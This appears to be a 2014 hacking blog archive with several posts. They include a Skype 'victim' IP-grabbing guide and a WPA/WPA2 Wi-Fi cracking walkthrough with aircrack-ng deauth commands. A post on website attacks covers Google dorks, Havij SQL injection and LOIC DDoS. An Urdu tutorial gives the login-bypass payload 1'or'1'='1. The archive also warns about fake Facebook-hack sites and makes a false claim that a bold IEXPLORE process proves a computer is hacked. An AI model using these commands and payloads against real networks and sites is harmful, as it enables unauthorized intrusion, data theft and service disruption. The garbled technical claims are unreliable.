Thursday 19 June 2014

How To Hack An IP On Skype Mega Post :p

Requirements -
  • Skype - Can be downloaded Here
  • CMD - Every computer has CMD (Start > All Programs > Accessories > Command Prompt)
Step 1.

[Image: skypedownload.png]

Step 2.
  • Add the Victim you wish to IP Grab. 
 
 Step 3.
  • After adding the victim, Make sure your Skype is like this shown in the picture. [Image: screenshot2fd.png]
  • If it is as like this -> [Image: screenshot3sz.png] Just simply click it and it will come like this -> [Image: screenshot4mn.png]
Step 4.
  • Double click the Victim you wish to IP Grab.


Step 5.
  • Go to Start > All Programs > Accessories > Right-click Command Prompt (CMD) & Run As Administrator.
[Image: screenshot5f.png] -> [Image: screenshot8rt.png] -> 
Step 6.
  • Close unwanted applications that are open, Such as other opened Skype friends. Leave open the victim you wish to IP Grab.
Step 7.
  • In CMD (Command Prompt) Type " netstat -nbt " (without the quotes)
[Image: unledpe.png]

Step 8.

  • A whole bunch of stuff should come up. Find [Skype.exe]
[Image: 83546786.png]

Step 9.
  • Now there will be more then one Skype.exe which is why you have to close the unwanted tabs of Skype. Now there should be 4 Not More IP's.
Step 10.
  • All you have to do now is Track does 4 (Even less) IP's and one will occur to be the one your looking for.
Hope this Tutorial is helpful, A Thanks would be appreciated..!

How To Hack WiFi Password On Backtrack 5r3

This lecture is about wpa\wpa2 cracking.
Requirements for WPA\wpa2 cracking:
1= Backtrack 5r3
2= WiFi device
3= world-list file
The commands which we will need in wpa\wpa2 cracking are as under:
1= Airmon-ng
2= Airmon-ng start wlan0
3= Airodump-ng mon0
4= Airodump-ng -c ( channel ) -w ( file name to rite captured packets ) --bssid (bssid of network) mon0
5= Aireplay-ng --deauth 1 -a (bssid) mon0
6= Aircrack-ng (file name) -w( drag worldlist file )
Process . . . .
1= Open terminal and type first command:
Airmon-ng :
This command will shows the interfaces status. You need to change the status from managed mode to monitor mode. (As shown)
2= Now type second command :
Airmon-ng start wlan0 :
This command enables monitor mode on the wireless interface. (As shown)
3= Now type third command:
Airodump-ng mon0 :
This command will scane all networks. (AS shown)
4= Now type foruth command:
Airodump-ng -c ( channel ) -w ( file name to save captured packets ) --bssid (bssid of network) mon0 :
This cammand will scane a single network and you must have to wate untill you get handshake file .For our example, it would look like:
airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0 (As Shown)
5= Now type fifth command :
Aireplay-ng --deauth 64 -a (bssid) mon0 :
This command will send deauth request if the data is not generating you can also increse the number of deauth requests.for our example, it would look like:
aireplay-ng --deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0. (As shown)
6= Now type sixth command :
NOTE: World-list should be in "/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/"
Aircrack-ng (file name) -w( drag world-list file ) :
This command will crack the password. (As Shown)
Hope all of you get it. If any problem ask me  facebook

Thursday 29 May 2014

BEWARE: List of websites making you fool in the name of Facebook Hacking

facebook hacking tool
From many days, when I was exploring Google for any latest news related to hacks, i got a point that how many websites are there when you search for ‘how to hack a Facebook account, facebook hacking, fb hack, facebook online hack & many more…’ Really I was also shocked when I searched it and found many direct websites, blogs claiming to hack any of the Facebook account LIVE.
The thing I want to say, you must beware of those sites because some of these websites are just redirecting you to complete surveys to earn money, some are installing malware on your systems to get your personal info.
So, for your safety,we collected a list of those websites which are making you fool in the name of Facebook Account Hacking, YOU MUST NOT USE ANY OF THESE WEBSITES, AND NOT FOR TESTING PURPOSE, as these sites can harm your systems:
Before you read the list, one of the link which is really dangerous and was founded on every page, on every related keywords of FB hack is from ‘Megaupload.org,’ which is basically coming up upon clicking various malicious URLs, you can find out that link below from the list.
One of the report was published just few days ago, in which hackers using a post named ‘How you can hack your friends’ facebook account,’ and in the name of that your Facebook account hijacked to like and follow other pages automatically without your own authentication.
We collected websites above from various sources, if you have any website which is not in the list above, so send us now HERE.

Wednesday 28 May 2014

Nowadays it’s easy to hack a website in just four steps

cartoon of hacking a website
Till yesteryears it required Tech Geeks to have an above average knowledge to hack a website but these days it has become a child’s play. Like conventional searches, you can Google out the tools required to plan a Hack-Attack on a website and with a little effort you can execute the same with ease. Here it is, in 4 easy steps, how hackers execute it.
Step 1: Identifying
The Hacktivists first identify their target website which they want to attack upon. They first qualify the website, according to the vulnerability level, they wish to attack. Checking the vulnerability of the website allows the hacker to prepare tools and techniques required to bring down the website.
Hackers generally use Google Dork, or Google Hacking, to execute a vulnerability check against these easy-to-hack websites. It was very recent that a hacker posted a list of 5,000 such websites which were really easy to be attacked. If they don’t wish to Google it out, they can Bing it. This tool is heaven for hackers as it helps in qualifying such websites.
Hackers have a ready-to-refer index of Dorks which points out the websites having a particular vulnerability. Right from passwords to Login credentials, there is Dork available for everything. They would Google “intitle:”Index of” master.passwd” which will return them a file containing the passwords and then they have the list of potential victims ready with them to execute the hack. 
Step 2: Spotting the vulnerabilities
Acunetix – a Windows based application to test the website – developed by a UK based company, was designed and is still in prominent use by developers to test the vulnerabilities in the website, but the technical expertise of hackers to this tool allows them access to point out the weakness levels of the website. Once the site is identified for attack, this tool is used by hackers to check the vulnerability of the website, as all websites qualified in level 1 may not be susceptible to attack.
Since the hackers have in-depth knowledge of the above mentioned software, they can not only crack the version from a trial one, but the cracked version is also available freely amongst the hacker community. Once they enter the URL or website address in this software they are able to point out the loopholes in the website and all they do is, move to step 3.
Step 3: The Attack on the website – SQL Injection
The SQL injection is the easiest and the most used way by hackers to hack into a website. It is used by hackers to hack into user accounts and steal information stored into its databases. This attack aims at information stealing using some lines of code of SQL (Structured Query List) which is a database programming language. The hacker’s don’t even have to learn the language for this attack, as there is an available software called “Havij” in the hacker forums where it is available free of cost. It comes as an easily useable application. Havij is originally a development from Iran. The word itself means carrot, a bad-slang for the word penis, ultimately meaning that the hack-ware helps penetrating a website.
Havij has 2 versions – paid and unpaid, both of them differential in powers of penetrating, although the paid version can be cracked and downloaded from other hacker forums. The interface of this software completely simple like any other windows application, which does its work when a newbie hacker just copies the link of the website needed to hack and pastes it into the application.
The tasks Havij can perform are very surprising. The best one for them and worst for the users of the website is called “Get”. It fetches all the data stored in the target website’s databases which range from usernames, passwords to phone numbers and bank details.
It is so easy for hackers that within a couple of minutes of their time, in which they can search, download, and use one or two automated hack-wares that allows them to access websites which are vulnerable to such attacks. Very much assured, that the websites of high profile companies like Google, Microsoft and Facebook are completely safe from such tools. As mentioned before, the vulnerability of the web is displayed by the attack made on Sony’s PlayStation Network which led to the leaking of their customers’ personal information in a very similar way.
Step 4: The DDoS – The A Game
SQL Injection has been used by the infamous hacktivist community – Anonymous for over a year now, but they tend to go forth with the DDoS when simple tools like the Havij don’t work. Again like the SQL (pronounced Sequel) Injection attack there are freely available tools for the DDoS as well.
As it appears, the DDoS is also as simple as the SQL Injection attack. The program used here is called the Low Orbit Ion Cannon (LOIC), which was brought to life by web developers for stress testing their own websites, but was later hijacked by hackers to attack the websites for non-social use.
The LOIC is available to the hackers freely on the website Source Forge. Again as simple as the Havij, the hackers just have to type in the link of the website they want to DDoS and the application does the rest. LOIC overloads the server of the target website with upto 200 requests per second.
Now again, the bigger websites can easily cope up with this type of an attack without crashing, most of the other websites cannot. Surely if a group of hackers, although newborn, dedicates itself to the job, it is very easy for them to complete it.
This type of technology horrifies the readers, but it is very simple to use by the hackers that they can even control it from their phones, meaning that they could well be watching a movie with their buddies in the cinema while attacking the website they want to bring down.
This is not an exhaustive list and processes how the hackers execute the act but there are many a tutorials on various hacking forums that teach how to perform the attack. There is no end to this notoriousness, in many cases a heinous crime, which has caused a loss of millions and millions of dollars to the world. So are you going to get your website checked through your developer today? May be today would be a real good day to get it done.

Thursday 22 May 2014

Hack Website SQL Injection Tutorial in Urdu


STEP 1: Sub Se Pehle Apko Ek Site Chahye Jis Ko Ap Ne Hack Karna Hain Is Dork List Ko Download Keren Here Aur Koi Bhi Dork Copy Kar Kay Google Mein Paste Kar Dain,Us Kay Bad Kafi Sites Show Hon Gi Aap Check Karte Jaye Konsi SQL Valn Hein
For example: Mere Pass Ye Site Hain www.Abc.org.in So Ab Hamare Pass Site Hain Jis Ko Hum Ne Hack Karna Hain,
Ab 2 Problems Hain Kay Number 1 Admin Login Find Karna and Number 2 Admin Login Hack Karna,
Solution Of Problem No.1 Admin Find Karna:
STEP 1: Is Tool Ko Download Kar Le Click Here To Download
Is Ko Extract Karen Apni Hard Disk Mein Aur Install Keren Havij Tool Aur RUN Keren
Open Havij Or Click Keren Find Admin Par Or Nichey Box Mein Apni Site Ka Link Enter Keren and Click On Start Or Ye Apko Show kar De Ga www.Abc.org.in
So Hamari Pehli Problem Ka Solution Mil Gaya Kay Admin Kese Find Karna Hain Ab Problem Number 2 Kay Admin Panel Hack Kese Karna Hain
2 Ways Hein Admin Login Hack Karne Kay SQL Mathod Mein Ek Havij Hein Aur 2nd SQL Querioes
SQL Quesries List Download Keren Click Here
Apne Net Browser Mein Jaye Aur Admin Login Open Keren User Name Ki Jaga Admin Type Keren Password Ki Jaga Bhi Admin Type Keren Agar Access Na Howa Tu Password Ki Jaga 1'or'1'='1 Ye Type Keren
So User : admin
Password : 1'or'1'='1
Aur Login Success
Thats it Dosto Apni Har Site Kay Admin Login Mein Ye Enter Kar Kay Check Kar Len...!
Enjoy..!

The Hacking Short course ebook in Urdu (Mediafire link)

The Hacking Short course ebook in Urdu (Mediafire link)


Hacking means to break the security  of any admin panel,no matter it is an website admin panel, an Email id admin panel, or a Personal Computer. to hack a website we use some methods which are called as exploits, so using these exploits a person can get access at any website's admin panel. here i am gonna post a urdu pdf hacking short course book from where you can get a complete over view about hacking but remember i just gonna share it to increase knowledge so every person will be liable for his own act


Mediafire Link
Download Urdu Hacking short course book

How To Know If YouR coMputer Is Hacked

1- Go To Your Windows Task Manager ( Ctrl+alt+Del )

2- then Go To ''Process''

3-If You Found ''IEXPLORE'' Written in Bold Like It Shown In The Pic That Mean Your Computer Is Hacked.

Photo: How To Know If YouR coMputer Is Hacked {{Share It ;) }}
************************************************

1- Go To Your Windows Task Manager ( Ctrl+alt+Del )

2- then Go To ''Process''

3-If You Found ''IEXPLORE'' Written in Bold Like It Shown In The Pic That Mean Your Computer Is Hacked.




#4in